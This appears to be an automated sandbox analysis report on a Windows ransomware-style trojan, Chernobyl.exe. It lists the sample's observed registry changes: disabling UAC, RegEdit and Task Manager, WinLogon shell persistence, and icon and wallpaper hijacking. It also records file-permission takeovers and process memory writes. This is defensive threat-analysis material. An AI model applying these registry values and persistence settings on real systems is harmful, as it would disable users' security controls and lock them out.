Malware Analysis Report

2024-11-16 12:35

Sample ID 240303-wrrrjsee85
Target Chernobyl.exe
SHA256 d762bff854ccaea043b18ef8a1c290aee0632ce517625ffb44d743e41c02bf9b
Tags
discovery evasion exploit persistence ransomware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d762bff854ccaea043b18ef8a1c290aee0632ce517625ffb44d743e41c02bf9b

Threat Level: Known bad

The file Chernobyl.exe was found to be: Known bad.

Malicious Activity Summary

discovery evasion exploit persistence ransomware trojan

Contains code to disable Windows Defender

Modifies WinLogon for persistence

UAC bypass

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Possible privilege escalation attempt

Modifies file permissions

Modifies system executable filetype association

Modifies WinLogon

Checks whether UAC is enabled

Drops file in System32 directory

Sets desktop wallpaper using registry

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of WriteProcessMemory

Modifies File Icons

Suspicious behavior: GetForegroundWindowSpam

System policy modification

Suspicious behavior: EnumeratesProcesses

Modifies Control Panel

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-03 18:09

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-03 18:09

Reported

2024-03-03 18:11

Platform

win7-20240215-en

Max time kernel

84s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\kill.ico C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
File opened for modification C:\Windows\System32\wallpaper.jpg C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.bmp" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\cluttscape.exe C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
File opened for modification C:\Windows\cluttscape.exe C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Desktop\WallpaperStyle = "2" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Desktop\TileWallpaper = "0" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Modifies File Icons

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B} C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Unknown\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2908 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 2908 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe C:\Windows\System32\cmd.exe
PID 108 wrote to memory of 2040 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
